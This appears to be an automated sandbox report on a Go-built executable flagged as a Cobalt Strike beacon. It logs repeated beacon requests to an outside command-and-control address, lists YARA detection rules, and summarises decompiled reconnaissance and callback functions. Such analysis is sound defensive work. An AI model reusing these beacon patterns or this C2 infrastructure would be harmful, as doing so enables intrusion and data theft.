Apr 17, 2024 07:08:50.361104965 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:50.702339888 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49828	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:54.177454948 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:54.504273891 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49829	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:54.949909925 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:55.279903889 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49830	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:55.729159117 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:56.068420887 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49831	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:56.536055088 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:56.919713020 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49832	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:57.354185104 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:57.688183069 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49833	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:58.138751030 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:58.486991882 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49834	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:58.939323902 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:59.269448996 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49835	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:59.707384109 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:09:00.039742947 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49836	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:09:00.456904888 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:09:00.771697044 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:09:00 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	07:06:55
Start date:	17/04/2024
Path:	C:\Users\user\Desktop\7xRIr23y7v.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\7xRIr23y7v.exe"
Imagebase:	0x7e0000
File size:	1'087'488 bytes
MD5 hash:	50C9F9B4FE6C26BE872AFF095E05A981
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	95.8%
Signature Coverage:	4.2%
Total number of Nodes:	191
Total number of Limit Nodes:	14

Executed Functions

Function 0000017DEA72E3A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 0000017DEA72E439

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

Part of subcall function 0000017DEA7361A8: _snprintf.LIBCMT ref: 0000017DEA736315

_snprintf.LIBCMT ref: 0000017DEA72E493
_snprintf.LIBCMT ref: 0000017DEA72E4AA
HttpOpenRequestA.WININET ref: 0000017DEA72E4EF
HttpSendRequestA.WININET ref: 0000017DEA72E520
InternetQueryDataAvailable.WININET ref: 0000017DEA72E550
InternetCloseHandle.WININET ref: 0000017DEA72E56E
InternetReadFile.WININET ref: 0000017DEA72E5AA
InternetCloseHandle.WININET ref: 0000017DEA72E5CB

Strings

%s%s, xrefs: 0000017DEA72E49F
*/*, xrefs: 0000017DEA72E3E0

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 1419689450-856325523
Opcode ID: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
Instruction ID: f8d6d4f2982f19204cb4ee454c2ecad0d3822e0724a84285dc524aa6362c3290
Opcode Fuzzy Hash: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
Instruction Fuzzy Hash: C561C372718A8A86FB12EB12F8007EA6BB5FBC47D4F500135EE8D5BA95DE38C605C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73455C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000017DEA734720: malloc.LIBCMT ref: 0000017DEA73473C

GetUserNameA.ADVAPI32 ref: 0000017DEA7345E3
GetComputerNameA.KERNEL32 ref: 0000017DEA7345F6

Part of subcall function 0000017DEA72EC3C: WSASocketA.WS2_32 ref: 0000017DEA72EC6A

GetModuleFileNameA.KERNEL32 ref: 0000017DEA73460F
strrchr.LIBCMT ref: 0000017DEA734621
GetVersionExA.KERNEL32 ref: 0000017DEA734644
_snprintf.LIBCMT ref: 0000017DEA7346CF

Strings

%s%s%s, xrefs: 0000017DEA7346B3

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleSocketUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 2891912487-1891519693
Opcode ID: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
Instruction ID: 410eb005ac71023d05e76016c80c1d8c9bd655397a11cd3d1b3120a2857ce70f
Opcode Fuzzy Hash: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
Instruction Fuzzy Hash: C0415E3570868A46EA06FB22B8147FA67B1BFC5BD4F544130AD9D0F7A6CF38C6468706

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72D780 Relevance: 10.9, APIs: 7, Instructions: 395
memoryfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000017DEA734848: htonl.WS2_32 ref: 0000017DEA734865

CreateFileMappingA.KERNEL32 ref: 0000017DEA72D9C9
MapViewOfFile.KERNEL32 ref: 0000017DEA72D9EB
CloseHandle.KERNEL32 ref: 0000017DEA72D9FB
HeapCreate.KERNEL32 ref: 0000017DEA72DA1A
HeapAlloc.KERNEL32 ref: 0000017DEA72DA38
VirtualAlloc.KERNEL32 ref: 0000017DEA72DA5C
GetLastError.KERNEL32 ref: 0000017DEA72DA6E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AllocCreateFileHeap$CloseErrorHandleLastMappingViewVirtualhtonl
String ID:
API String ID: 1975060083-0
Opcode ID: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
Instruction ID: bf796397f523e1bdb62e483e43ce4e197b2d3a41b5199961547bef9c74eaaf59
Opcode Fuzzy Hash: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
Instruction Fuzzy Hash: 99F1ACB261464A87FB66EB25F8403FA63B1FFC4744F054135DACE8BA82DE38E6458341

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA721184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 0000017DEA7211B8
CryptAcquireContextA.ADVAPI32 ref: 0000017DEA7211DC
CryptGenRandom.ADVAPI32 ref: 0000017DEA7211F0
CryptReleaseContext.ADVAPI32 ref: 0000017DEA721204

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0000017DEA7211A2, 0000017DEA7211C6
(, xrefs: 0000017DEA7211D4

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
Instruction ID: cfee83ee84dec2f2af6018cf406e7934975dd57881203d64fa00ce5731873e50
Opcode Fuzzy Hash: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
Instruction Fuzzy Hash: 89016D71708A4A82E711DB65F8883A9B7B1FBD8B94F548035C68D8B264DF78CA49C741

Uniqueness

Uniqueness Score: -1.00%

Function 0083C720 Relevance: 1.5, APIs: 1, Instructions: 28
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNELBASE ref: 0083C781

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID: TimerWaitable
String ID:
API String ID: 1823812067-0
Opcode ID: 665fbd649bad362e55658b16a04c8d6f963af3a18d11f4e6321c7ed0dfb5015a
Instruction ID: 8df72b1f333270ee7dc9103b45bc43c943f5afb480e8897a62fa7cd05c34f998
Opcode Fuzzy Hash: 665fbd649bad362e55658b16a04c8d6f963af3a18d11f4e6321c7ed0dfb5015a
Instruction Fuzzy Hash: D3017476215F8485DB508B4AF8A035A7364F3C9FA4F545226EEAD977A8CF3DC1118B40

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000017DEA734720: malloc.LIBCMT ref: 0000017DEA73473C

malloc.LIBCMT ref: 0000017DEA72CB1E

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

Part of subcall function 0000017DEA73AC00: malloc.LIBCMT ref: 0000017DEA73AC50

Part of subcall function 0000017DEA73AC00: realloc.LIBCMT ref: 0000017DEA73AC5F

Part of subcall function 0000017DEA72EFC0: GetLocalTime.KERNEL32 ref: 0000017DEA72EFDF

malloc.LIBCMT ref: 0000017DEA72CC10
_snprintf.LIBCMT ref: 0000017DEA72CC8E
_snprintf.LIBCMT ref: 0000017DEA72CCB6
free.LIBCMT ref: 0000017DEA72CE4B

Part of subcall function 0000017DEA735200: GetTickCount.KERNEL32 ref: 0000017DEA735212
Part of subcall function 0000017DEA735200: GetTickCount.KERNEL32 ref: 0000017DEA73522A
Part of subcall function 0000017DEA735200: GetTickCount.KERNEL32 ref: 0000017DEA735748
Part of subcall function 0000017DEA735200: GetTickCount.KERNEL32 ref: 0000017DEA73575E
Part of subcall function 0000017DEA735200: shutdown.WS2_32 ref: 0000017DEA73577D
Part of subcall function 0000017DEA735200: shutdown.WS2_32 ref: 0000017DEA735792
Part of subcall function 0000017DEA735200: closesocket.WS2_32 ref: 0000017DEA73579C
Part of subcall function 0000017DEA735200: free.LIBCMT ref: 0000017DEA7357BC
Part of subcall function 0000017DEA735200: free.LIBCMT ref: 0000017DEA7357D1

_snprintf.LIBCMT ref: 0000017DEA72CCDD

Part of subcall function 0000017DEA73A324: Sleep.KERNEL32 ref: 0000017DEA73A367
Part of subcall function 0000017DEA73A324: ExitThread.KERNEL32 ref: 0000017DEA73A371
Part of subcall function 0000017DEA73A324: CreateThread.KERNEL32 ref: 0000017DEA73A396

Strings

/submit.php, xrefs: 0000017DEA72CCC7, 0000017DEA72CDA9

Memory Dump Source

